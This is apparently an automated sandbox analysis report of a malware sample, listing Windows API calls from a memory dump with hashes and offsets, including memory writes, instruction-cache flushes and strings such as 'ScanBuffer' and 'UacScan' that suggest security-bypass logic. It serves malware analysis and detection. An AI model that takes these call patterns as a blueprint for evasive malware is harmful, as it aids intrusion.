                                                                                                                        • Instruction ID: 46b6b81dac0a2bb1240accdf55d7b32d95a71dbfda7978d02f3cc2437bcdc54a
                                                                                                                        • Opcode Fuzzy Hash: fd49e1365938428de8197f8916c26a6a802590abb0963e6ac34e8cfe5ca0467c
                                                                                                                        • Instruction Fuzzy Hash: 88B1BE74A016089FEB15CFA9E484A9DFBF6FF89314F248169E855AB360DB30AC45CF50
APIs
• VariantCopy.OLEAUT32(00000000,00000000), ref: 02D3E781
  • Part of subcall function 02D3E364: VariantClear.OLEAUT32(?), ref: 02D3E373
Memory Dump Source
• Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID: Variant$ClearCopy
• String ID:
• API String ID: 274517740-0
• Opcode ID: b3efd9deaa7027cf286d44fd33338d465bdda2a718ebd0b2b06445fe5d1741d0
• Instruction ID: 2eefe0bf0dd4e6b7a9227461812c9e83c7dccad157217553ccfc55f26453a5b7
• Opcode Fuzzy Hash: b3efd9deaa7027cf286d44fd33338d465bdda2a718ebd0b2b06445fe5d1741d0
• Instruction Fuzzy Hash: 8011A161B1021497DB33AF29D9C8A6677DAEF84750B108466E58A9B3D5EB30CC41CA72
APIs
Memory Dump Source
• Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID: InitVariant
• String ID:
• API String ID: 1927566239-0
• Opcode ID: 104a7cd4bdd661c9eb7cbc3aea24b965843119e36a0f446ea5e25e76aebc3b2d
• Instruction ID: c542f6c39033d170279c4dbea2d4181c6ec001656d55c295c8b4014078490b44
• Opcode Fuzzy Hash: 104a7cd4bdd661c9eb7cbc3aea24b965843119e36a0f446ea5e25e76aebc3b2d
• Instruction Fuzzy Hash: 1C313E72A00218EBDB12DFA8D984AAA77E9EF4C324F444565F945D3390D734DD50CBA1
APIs
  • Part of subcall function 02D481CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D4823C,?,?,00000000,?,02D47A7E,ntdll,00000000,00000000,02D47AC3,?,?,00000000), ref: 02D4820A
  • Part of subcall function 02D481CC: GetModuleHandleA.KERNELBASE(?), ref: 02D4821E
  • Part of subcall function 02D48274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D482FC,?,?,00000000,00000000,?,02D48215,00000000,KernelBASE,00000000,00000000,02D4823C), ref: 02D482C1
  • Part of subcall function 02D48274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D482C7
  • Part of subcall function 02D48274: GetProcAddress.KERNEL32(?,?), ref: 02D482D9
  • Part of subcall function 02D47D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02D47DEC
  • Part of subcall function 02D48338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02D483C2), ref: 02D483A4
• FreeLibrary.KERNEL32(74FA0000,00000000,00000000,00000000,00000000,02DB738C,Function_0000662C,00000004,02DB739C,02DB738C,05F5E103,00000040,02DB73A0,74FA0000,00000000,00000000), ref: 02D48AAA
Memory Dump Source
• Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
• String ID:
• API String ID: 1478290883-0
• Opcode ID: ad84e352ca2e5853e2fcc358f60432296f5d43a815b07186607647a2ab6377d4
• Instruction ID: a981da06e69e6ea05374d2356f75d88dca900483a6877da5cc1f54161babf7ed
• Opcode Fuzzy Hash: ad84e352ca2e5853e2fcc358f60432296f5d43a815b07186607647a2ab6377d4
• Instruction Fuzzy Hash: 7A213E71A80300EBFB42FBA4EC16B9EB7AADB44740F500865B955E73C0DA74AD009F78
APIs
• CLSIDFromProgID.OLE32(00000000,?,00000000,02D46DB9,?,?,?,00000000), ref: 02D46D99
  • Part of subcall function 02D34C60: SysFreeString.OLEAUT32(02D4F4A4), ref: 02D34C6E
Memory Dump Source
• Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID: FreeFromProgString
• String ID:
• API String ID: 4225568880-0
• Opcode ID: af0e40ff91f219eee1e5f1dfa55a223ba63485176a56c3e9a3bc27a3603e18c4
• Instruction ID: de7e914f03e7d5ac7763eb70d30b2b92dd92c30b8ca467679535ed169f6bf716
• Opcode Fuzzy Hash: af0e40ff91f219eee1e5f1dfa55a223ba63485176a56c3e9a3bc27a3603e18c4
• Instruction Fuzzy Hash: 84E06D76604608BBE712EB66FC51D9E77EDDF8A710F5144B1E901A3710EA79AE0488B0
APIs
• GetModuleFileNameA.KERNEL32(02D30000,?,00000105), ref: 02D35886
  • Part of subcall function 02D35ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02D30000,02D5E790), ref: 02D35AE8
  • Part of subcall function 02D35ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02D30000,02D5E790), ref: 02D35B06
  • Part of subcall function 02D35ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02D30000,02D5E790), ref: 02D35B24
  • Part of subcall function 02D35ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02D35B42
  • Part of subcall function 02D35ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02D35BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02D35B8B
  • Part of subcall function 02D35ACC: RegQueryValueExA.ADVAPI32(?,02D35D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02D35BD1,?,80000001), ref: 02D35BA9
  • Part of subcall function 02D35ACC: RegCloseKey.ADVAPI32(?,02D35BD8,00000000,?,?,00000000,02D35BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02D35BCB
Memory Dump Source
• Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID: Open$FileModuleNameQueryValue$Close
• String ID:
• API String ID: 2796650324-0
• Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
• Instruction ID: 9ed6749d2f7b92169a5d79048a4e70116b712e8e8c9da7b715190852a229079a
• Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
• Instruction Fuzzy Hash: C7E065B1A013148FCB51DEA8D8C0B9633D8AB08750F4409A1EC68CF34AD7B1DE208BE0
APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02D37DF4
Memory Dump Source
• Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
• Instruction ID: b33909245cec96185b939d2750d169b16ee10ecf44d8513ce4cf5c46e0592525
• Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
• Instruction Fuzzy Hash: B1D05BF23091507AE225965B9D44EA75BDCCBC6770F10063DF558C7280D720CC01C6B1
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3341692771-0
                                                                                                                        • Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                        • Instruction ID: 7ea4236288220eaba20a4f47ef52c331b7880b446fabaa067baedc460b79a7e7
                                                                                                                        • Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                        • Instruction Fuzzy Hash: B8C012A66002305BEB225699ECC075262CCDB05294F1440A19404D7354E364DC0086B0
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesA.KERNEL32(00000000,?,02D5356F,ScanString,02DB7380,02D5B7B8,OpenSession,02DB7380,02D5B7B8,ScanBuffer,02DB7380,02D5B7B8,OpenSession,02DB7380,02D5B7B8,Initialize), ref: 02D37E8B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3188754299-0
                                                                                                                        • Opcode ID: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                        • Instruction ID: 05b37cd57bae146fb5e423abef34a9437140519292f25e69b161051938149148
                                                                                                                        • Opcode Fuzzy Hash: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                        • Instruction Fuzzy Hash: A8C08CF22126020A2EA2A5FCDCC421942C98986234B601E61E438EA3C1D31EDC222834
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesA.KERNEL32(00000000,?,02D5041F,ScanString,02DB7380,02D5B7B8,OpenSession,02DB7380,02D5B7B8,ScanString,02DB7380,02D5B7B8,UacScan,02DB7380,02D5B7B8,UacInitialize), ref: 02D37E67
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3188754299-0
                                                                                                                        • Opcode ID: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                        • Instruction ID: 3061cccb1a0128f0bfe6e949ef3977fbd299fa9938561f06ccb5f2fb6c970213
                                                                                                                        • Opcode Fuzzy Hash: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                        • Instruction Fuzzy Hash: F7C08CE02026411A6A9265BCACC424952CA89052387640A61A438E63E2D326DCA26834
                                                                                                                        APIs
                                                                                                                        • timeSetEvent.WINMM(00002710,00000000,02D5C350,00000000,00000001), ref: 02D5C36C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Eventtime
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2982266575-0
                                                                                                                        • Opcode ID: ec8b3698af4a25f74c2a59df34edd52226f3ad63a3b49502f77f7bd3c46cb3a7
                                                                                                                        • Instruction ID: 50d26258122ef207ee38267cfe98707a746bc0eb727f130e3e66b2f127c2e4b4
                                                                                                                        • Opcode Fuzzy Hash: ec8b3698af4a25f74c2a59df34edd52226f3ad63a3b49502f77f7bd3c46cb3a7
                                                                                                                        • Instruction Fuzzy Hash: DDC048B17A03002AFA119AAAAC82F22169DD305B10F500456BA44AA3C1D2E26C508E68
                                                                                                                        APIs
                                                                                                                        • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02D34C3F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2525500382-0
                                                                                                                        • Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                                                        • Instruction ID: f4183d13c45d01835f7c3d8e6bb3fbd0898b34dd341665c365febc80211ec09a
                                                                                                                        • Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                                                        • Instruction Fuzzy Hash: 18B0123820820215FA1B2662EF01733004C5B4038AF8400719F98C83D0FF0CCC01C835
                                                                                                                        APIs
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 02D34C57
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3341692771-0
                                                                                                                        • Opcode ID: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                                                                        • Instruction ID: 0dbd26e6d78077c3887535f41ca6cbd0893b542967d6a4ce8dbc3cab339de9d3
                                                                                                                        • Opcode Fuzzy Hash: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                                                                        • Instruction Fuzzy Hash: 66A022AC0003030A8F0B332EC02002F2233BFC0300BC8C0E802000A2008F3ECC00EC30
                                                                                                                        APIs
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02D31A03,?,02D32000), ref: 02D315E2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4275171209-0
                                                                                                                        • Opcode ID: 9956f615ec6b468bf9131876fcb9ce67db2e8dfec302c6f891dece17c11eedb6
                                                                                                                        • Instruction ID: dcfa7e3b8c304b0841179693377f53ffe20c37a9e64109e50d1ad41958970964
                                                                                                                        • Opcode Fuzzy Hash: 9956f615ec6b468bf9131876fcb9ce67db2e8dfec302c6f891dece17c11eedb6
                                                                                                                        • Instruction Fuzzy Hash: A1F037F0B41300CFDB0ACFB999643016BE2E78A344F10857DD609DB799E7718801CB90
                                                                                                                        APIs
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02D32000), ref: 02D316A4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4275171209-0
                                                                                                                        • Opcode ID: 138563daae350b6005ac0bf84af5997e645487dc1eab088522b255a16c8d29e7
                                                                                                                        • Instruction ID: 4d8f8896d88419cb3de7f5a20a044cdca9b51848b02166908c9c830edc96d8e9
                                                                                                                        • Opcode Fuzzy Hash: 138563daae350b6005ac0bf84af5997e645487dc1eab088522b255a16c8d29e7
                                                                                                                        • Instruction Fuzzy Hash: BBF090B2A41695ABD7129E5ADC90782BB98FB00314F054139F90897B40D770EC108BD4
                                                                                                                        APIs
                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02D31704
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1263568516-0
                                                                                                                        • Opcode ID: 4a9cb7a300d17af57070c298d4b7dc3bbc0bbb1b8cf8bae55d61bc2c912f28ea
                                                                                                                        • Instruction ID: ec3f00e8b917c7beea2f21a50c9dca72102a3ce24cc53d3333364a616cc99579
                                                                                                                        • Opcode Fuzzy Hash: 4a9cb7a300d17af57070c298d4b7dc3bbc0bbb1b8cf8bae55d61bc2c912f28ea
                                                                                                                        • Instruction Fuzzy Hash: A2E086B5300312EFD7115A799D407126BDCEB44654F184475F549DB341D6A0EC10CB70
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02D4ADA3,?,?,02D4AE35,00000000,02D4AF11), ref: 02D4AB30
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02D4AB48
• GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02D4AB5A
• GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02D4AB6C
• GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02D4AB7E
• GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02D4AB90
• GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02D4ABA2
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 02D4ABB4
• GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02D4ABC6
• GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02D4ABD8
• GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02D4ABEA
• GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02D4ABFC
• GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02D4AC0E
• GetProcAddress.KERNEL32(00000000,Module32First), ref: 02D4AC20
• GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02D4AC32
• GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02D4AC44
• GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02D4AC56
Strings
Memory Dump Source
